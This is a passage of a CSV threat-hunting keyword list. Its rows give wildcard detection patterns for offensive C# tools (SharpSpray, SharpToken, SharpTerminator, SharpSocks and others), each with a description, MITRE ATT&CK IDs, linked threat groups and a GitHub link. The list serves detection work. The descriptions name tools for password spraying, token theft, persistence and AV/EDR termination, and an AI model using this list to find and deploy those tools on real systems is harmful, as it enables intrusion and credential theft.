T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSniper.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSocks.exe*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocks.pfx*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocks.resx*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocks.sln*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocksCommon*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocksConfig*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocksImplant*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocksServer*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSpawner.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpSphere.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSploit*","offensive_tool_keyword","SharpSploit","SharpSploitis a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1059 - T1027 - T1505","TA0002 - TA0003 - TA0008 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","1632","322","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" +"*SharpSploit.dll*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*SharpSploitConsole_x*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" +"*SharpSploitDomainRecon*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpSploitDomainReconImpl*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpSplunkWhisperer2*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*SharpSpoolTrigger.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharpSpray*","offensive_tool_keyword","SharpSpray","This project is a C# port of my PowerSpray.ps1 script. SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.","T1110 - T1558","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/jnqpblc/SharpSpray","1","1","N/A","N/A","2","176","36","2019-06-30T03:10:52Z","2019-03-04T17:14:07Z" +"*SharpSpray.exe *","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*SharpSpray.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSQLPwn*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","1","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" +"*SharpSQLPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpStay.csproj*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*Sharpstay.exe *","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*SharpStay.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*SharpStay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpStay.sln*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*SharpStay-master*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*Sharp-Suite.git*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SharpSvc.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSword.csproj*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*SharpSword.exe*","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*SharpSword.exe*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*SharpSword.sln*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*SharpSword-main.*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*SharpSystemTriggers.git*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharpSystemTriggers.sln*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharpSystemTriggers-main*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharpTask.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharptelnet *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpTemplateResources/cmd/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SharpTerminator.exe*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*SharpTerminator.git*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*SharpTerminator.sln*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*SharpTerminator-main.zip*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*SharpToken* add_user*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken* delete_user*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken* enableUser *","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken* list_token*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken* tscon *","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken.csproj*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*SharpToken.exe*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken.git*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken-main.zip*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpUnhooker.*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" +"*SharpUnhooker-main*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense 